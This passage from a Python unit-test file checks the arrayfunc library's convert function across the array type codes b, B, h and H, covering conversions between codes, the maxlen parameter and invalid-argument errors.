arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code b - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code b - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code b - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code b - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code b - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code b - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code b - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code b - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code b - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code b - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
    """Test convert for basic operation in array code b - Test maxlen parameter.

    Only the first 'maxlen' elements may be converted; the remainder of
    the output array must be left untouched.
    """
    outputtest = 'l'
    testvals = TestData.TestLimits(self.TypeCode, outputtest)
    data = array.array(self.TypeCode, testvals)
    dataout = array.array(outputtest, itertools.repeat(0, len(data)))
    limlen = len(dataout) // 2
    # Save the second part of the output array so that we can verify
    # afterwards that it was not modified.
    originalout = dataout[limlen:]
    arrayfunc.convert(data, dataout, maxlen=limlen)
    # The first part of the output should have been converted.
    for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
        self.assertEqual(dataoutitem, dataitem)
    # The second part of the output should be unchanged.
    for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
        self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_b(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'b'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code b - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code b - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code b - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code b - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code b - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code b - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code b - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_B(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'B'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code B - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code B - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code B - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code B - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code B - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code B - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code B - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code B - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code B - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code B - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code B - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code B - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code B - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_B(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'B'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code B - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code B - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code B - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code B - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code B - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code B - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code B - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_h(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'h'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code h - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code h - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code h - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code h - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code h - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code h - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code h - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code h - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code h - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code h - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code h - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code h - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code h - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_h(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'h'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code h - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code h - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code h - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code h - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code h - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code h - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code h - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_H(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'H'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code H - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code H - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code H - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code H - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code H - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code H - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code H - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code H - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code H - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code H - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code H - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code H - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
	"""Test convert for basic operation in array code H - Test maxlen parameter.

	Only the first maxlen elements should be converted; the remainder
	of the output array must be left untouched.
	"""
	outputtest = 'l'
	testvals = TestData.TestLimits(self.TypeCode, outputtest)
	data = array.array(self.TypeCode, testvals)
	dataout = array.array(outputtest, itertools.repeat(0, len(data)))
	limlen = len(dataout) // 2
	# Save the second part of the output array so we can verify later
	# that the conversion did not write past maxlen elements.
	originalout = dataout[limlen:]
	arrayfunc.convert(data, dataout, maxlen=limlen)
	# This data should be converted.
	# (The unused 'converted' temporary from the original was removed.)
	for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
		self.assertEqual(dataoutitem, dataitem)
	# This data should be unchanged.
	for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
		self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_H(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'H'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code H - Zero length array.
"""
